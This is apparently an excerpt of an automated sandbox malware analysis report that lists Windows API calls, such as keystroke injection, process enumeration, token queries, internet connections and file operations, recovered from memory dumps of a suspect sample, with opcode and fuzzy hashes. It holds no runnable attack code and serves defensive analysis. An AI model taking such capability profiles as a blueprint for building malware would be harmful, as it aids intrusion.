• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: Variant$AllocClearCopyInitString
• String ID:
• API String ID: 2808897238-0
APIs
• GetWindowRect.USER32(00F7DDD0,?), ref: 00339863
• ScreenToClient.USER32(00000002,00000002), ref: 00339896
• MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00339903
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: Window$ClientMoveRectScreen
• String ID:
• API String ID: 3880355969-0
APIs
• SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00309AD2
• __itow.LIBCMT ref: 00309B03
  • Part of subcall function 00309D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00309DBE
• SendMessageW.USER32(?,0000110A,00000001,?), ref: 00309B6C
• __itow.LIBCMT ref: 00309BC3
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: MessageSend$__itow
• String ID:
• API String ID: 3379773720-0
APIs
• socket.WSOCK32(00000002,00000002,00000011), ref: 003269D1
• WSAGetLastError.WSOCK32(00000000), ref: 003269E1
  • Part of subcall function 002B9837: __itow.LIBCMT ref: 002B9862
  • Part of subcall function 002B9837: __swprintf.LIBCMT ref: 002B98AC
• #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00326A45
• WSAGetLastError.WSOCK32(00000000), ref: 00326A51
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: ErrorLast$__itow__swprintfsocket
• String ID:
• API String ID: 2214342067-0
APIs
• #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0033F910), ref: 003264A7
• _strlen.LIBCMT ref: 003264D9
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: _strlen
• String ID:
• API String ID: 4218353326-0
APIs
• CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0031B89E
• GetLastError.KERNEL32(?,00000000), ref: 0031B8C4
• DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0031B8E9
• CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0031B915
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: CreateHardLink$DeleteErrorFileLast
• String ID:
• API String ID: 3321077145-0
APIs
• InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 003388DE
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: InvalidateRect
• String ID:
• API String ID: 634782764-0
APIs
• ClientToScreen.USER32(?,?), ref: 0033AB60
• GetWindowRect.USER32(?,?), ref: 0033ABD6
• PtInRect.USER32(?,?,0033C014), ref: 0033ABE6
• MessageBeep.USER32(00000000), ref: 0033AC57
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: Rect$BeepClientMessageScreenWindow
• String ID:
• API String ID: 1352109105-0
                                                                                                                    • Opcode ID: 980b07ea29153262290195a49a836e015ea2d5f124eb6b0e7a066a68aa7a95a0
                                                                                                                    • Instruction ID: db27d1b3cb34172f5020e03980a9c201f147ed7e094c60c93606c15c44dd1067
                                                                                                                    • Opcode Fuzzy Hash: 980b07ea29153262290195a49a836e015ea2d5f124eb6b0e7a066a68aa7a95a0
                                                                                                                    • Instruction Fuzzy Hash: EA416F30A00919EFCF27DF58D8C4A59BBF9FB49310F1991A9E499DB261D730A841CB92
                                                                                                                    APIs
                                                                                                                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00310B27
                                                                                                                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 00310B43
                                                                                                                    • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00310BA9
                                                                                                                    • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00310BFB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 432972143-0
                                                                                                                    • Opcode ID: 1aba60d6bdb5285eacce567192cd598dfb2378cdc81c1184ff5b1ae0ad603ec9
                                                                                                                    • Instruction ID: 7796fa4ebee8d6f322f851b8bb94b172bb74735c2217c94af7f3bf20cbb62e05
                                                                                                                    • Opcode Fuzzy Hash: 1aba60d6bdb5285eacce567192cd598dfb2378cdc81c1184ff5b1ae0ad603ec9
                                                                                                                    • Instruction Fuzzy Hash: 4A313770D48208AEFB3F8A258C05BFABBA9AB4D318F44825AE491561D1C3F5C9C09751
                                                                                                                    APIs
                                                                                                                    • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00310C66
                                                                                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 00310C82
                                                                                                                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 00310CE1
                                                                                                                    • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00310D33
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 432972143-0
                                                                                                                    • Opcode ID: ac7600424243fd4e185b2dd70c3166b79a27a14f64d3fd545147aa938df48fa4
                                                                                                                    • Instruction ID: 6186329c21bbd67577b03693839feb46e9f1b828e8925a3b16c2c0595a07c24a
                                                                                                                    • Opcode Fuzzy Hash: ac7600424243fd4e185b2dd70c3166b79a27a14f64d3fd545147aa938df48fa4
                                                                                                                    • Instruction Fuzzy Hash: AB315830940308AEFF3F8B689C15BFEBB6AAB4D310F04432AE4905A5D1C3B599D58BD1
                                                                                                                    APIs
                                                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 002E61FB
                                                                                                                    • __isleadbyte_l.LIBCMT ref: 002E6229
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 002E6257
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 002E628D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3058430110-0
                                                                                                                    • Opcode ID: 445c540a1247101fa43a1002e5c059249e325ec5903dec2c5f9153f53b78895b
                                                                                                                    • Instruction ID: 45bba755c19babc3da5a5d900731ece9aefbff95799e0cac0a440ce5ee362de0
                                                                                                                    • Opcode Fuzzy Hash: 445c540a1247101fa43a1002e5c059249e325ec5903dec2c5f9153f53b78895b
                                                                                                                    • Instruction Fuzzy Hash: 6131F230A50286AFDF228F76CC48BAA7FA9FF51390F554029E9248B191D771EC60DB90
                                                                                                                    APIs
                                                                                                                    • GetForegroundWindow.USER32 ref: 00334F02
                                                                                                                      • Part of subcall function 00313641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0031365B
                                                                                                                      • Part of subcall function 00313641: GetCurrentThreadId.KERNEL32 ref: 00313662
                                                                                                                      • Part of subcall function 00313641: AttachThreadInput.USER32(00000000,?,00315005), ref: 00313669
                                                                                                                    • GetCaretPos.USER32(?), ref: 00334F13
                                                                                                                    • ClientToScreen.USER32(00000000,?), ref: 00334F4E
                                                                                                                    • GetForegroundWindow.USER32 ref: 00334F54
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2759813231-0
                                                                                                                    • Opcode ID: 0861418563609ada1d1d6727b8eea4ac762015a7d105c6abc9cd16329f111fe8
                                                                                                                    • Instruction ID: a6dc79fc382eb5e4fb24a382c9999a474a15eeb6245c5b0c3246e38f7671bae7
                                                                                                                    • Opcode Fuzzy Hash: 0861418563609ada1d1d6727b8eea4ac762015a7d105c6abc9cd16329f111fe8
                                                                                                                    • Instruction Fuzzy Hash: 6F311872E00108AFDB01EFA5C8859EEB7FDEF99300F10406AE515E7251DA75AE55CBA0
                                                                                                                    APIs
                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00313C7A
                                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00313C88
                                                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 00313CA8
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00313D52
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 420147892-0
                                                                                                                    • Opcode ID: 6693656df0e02576e974bbd82a8244a46d25b93d726726525e79410d2dfd92c4
                                                                                                                    • Instruction ID: e1ab7102b5312fdd17d500e175569542cc7ada2f14aa50d638d8328b5e8e208d
                                                                                                                    • Opcode Fuzzy Hash: 6693656df0e02576e974bbd82a8244a46d25b93d726726525e79410d2dfd92c4
                                                                                                                    • Instruction Fuzzy Hash: 0731B4711083059FD305EF60D881AFFBBE8EF99354F50092DF481861A1EB719A49CB92
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B2612: GetWindowLongW.USER32(?,000000EB), ref: 002B2623
                                                                                                                    • GetCursorPos.USER32(?), ref: 0033C4D2
                                                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,002EB9AB,?,?,?,?,?), ref: 0033C4E7
                                                                                                                    • GetCursorPos.USER32(?), ref: 0033C534
                                                                                                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,002EB9AB,?,?,?), ref: 0033C56E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2864067406-0
                                                                                                                    • Opcode ID: 7460a1ee99bbe71c7553264c2c60d430709fb1594c00c694852d20469d63e964
                                                                                                                    • Instruction ID: 8ec8112014e3bbe0bd2014f85773061e82a27f69f04dba8dc9e02c93d8b62f70
                                                                                                                    • Opcode Fuzzy Hash: 7460a1ee99bbe71c7553264c2c60d430709fb1594c00c694852d20469d63e964
                                                                                                                    • Instruction Fuzzy Hash: BC31D235610018FFDB27CF59C898EEA7BB9EB0A310F444069F9099B262C731AD50DFA4
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0030810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00308121
                                                                                                                      • Part of subcall function 0030810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0030812B
                                                                                                                      • Part of subcall function 0030810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0030813A
                                                                                                                      • Part of subcall function 0030810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00308141
                                                                                                                      • Part of subcall function 0030810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00308157
                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 003086A3
                                                                                                                    • _memcmp.LIBCMT ref: 003086C6
                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 003086FC
                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00308703
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1592001646-0
                                                                                                                    • Opcode ID: 7198e9b93c4fd1fa25005e7b1533269e6e8bec2e8dc17c5f4e81bb6e792f9e2b
                                                                                                                    • Instruction ID: 1fc14a23aa3318502a1c8e4cc9458bdba6ce5bd61ea8ee81b1e4de9e25bf2106
                                                                                                                    • Opcode Fuzzy Hash: 7198e9b93c4fd1fa25005e7b1533269e6e8bec2e8dc17c5f4e81bb6e792f9e2b
                                                                                                                    • Instruction Fuzzy Hash: 1E219D71E02208EFDB11DFA8C959BEEB7B8EF44304F164059E585AB281DB31AE05CB90
                                                                                                                    APIs
                                                                                                                    • __setmode.LIBCMT ref: 002D09AE
                                                                                                                      • Part of subcall function 002B5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00317896,?,?,00000000), ref: 002B5A2C
                                                                                                                      • Part of subcall function 002B5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00317896,?,?,00000000,?,?), ref: 002B5A50
                                                                                                                    • _fprintf.LIBCMT ref: 002D09E5
                                                                                                                    • OutputDebugStringW.KERNEL32(?), ref: 00305DBB
                                                                                                                      • Part of subcall function 002D4AAA: _flsall.LIBCMT ref: 002D4AC3
                                                                                                                    • __setmode.LIBCMT ref: 002D0A1A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 521402451-0
                                                                                                                    • Opcode ID: 51549757d7147b0cffe79732e9076aaa9d3a4dda307e4d722713122c80f9aff1
                                                                                                                    • Instruction ID: f898b27b674dac773b47e38779b6cac74792cec7efefb8f8b06f8b18b0629041
                                                                                                                    • Opcode Fuzzy Hash: 51549757d7147b0cffe79732e9076aaa9d3a4dda307e4d722713122c80f9aff1
                                                                                                                    • Instruction Fuzzy Hash: 601157319286046FC705B3B49C86AFE77AC9F45360F244027F205A72D2EE705CA25BE0
                                                                                                                    APIs
                                                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003217A3
                                                                                                                      • Part of subcall function 0032182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0032184C
                                                                                                                      • Part of subcall function 0032182D: InternetCloseHandle.WININET(00000000), ref: 003218E9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Internet$CloseConnectHandleOpen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1463438336-0
                                                                                                                    • Opcode ID: 7d4077951efac8ae35954e05f10f9d04c2f7a26f641243a8aa48b2ab03023c7f
                                                                                                                    • Instruction ID: af1184c2b4deab23e8186793f4e44b2cb1e9c06281d3d674fbd168fa7669e9f3
                                                                                                                    • Opcode Fuzzy Hash: 7d4077951efac8ae35954e05f10f9d04c2f7a26f641243a8aa48b2ab03023c7f
                                                                                                                    • Instruction Fuzzy Hash: BB21C331600615BFEB139F64ED81FBBBBADFF98710F10412AFA119A650DB71D811A7A0
                                                                                                                    APIs
                                                                                                                    • GetFileAttributesW.KERNEL32(?,0033FAC0), ref: 00313A64
                                                                                                                    • GetLastError.KERNEL32 ref: 00313A73
                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00313A82
                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0033FAC0), ref: 00313ADF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2267087916-0
                                                                                                                    • Opcode ID: efded9bf31b390171a83bc9d82adb89e2fb6b468a6023c16a282aaf82e263f5e
                                                                                                                    • Instruction ID: adc99b46c7b4524642bf538b7001f2ef38a14718eb2e6269d56c8e94fef92af0
                                                                                                                    • Opcode Fuzzy Hash: efded9bf31b390171a83bc9d82adb89e2fb6b468a6023c16a282aaf82e263f5e
                                                                                                                    • Instruction Fuzzy Hash: B52186745082059F8715EF28C8818EB77E8EE59364F144A2DF4D9C72A1D731DE95CF82
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0030F0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0030DCD3,?,?,?,0030EAC6,00000000,000000EF,00000119,?,?), ref: 0030F0CB
                                                                                                                      • Part of subcall function 0030F0BC: lstrcpyW.KERNEL32(00000000,?,?,0030DCD3,?,?,?,0030EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0030F0F1
                                                                                                                      • Part of subcall function 0030F0BC: lstrcmpiW.KERNEL32(00000000,?,0030DCD3,?,?,?,0030EAC6,00000000,000000EF,00000119,?,?), ref: 0030F122
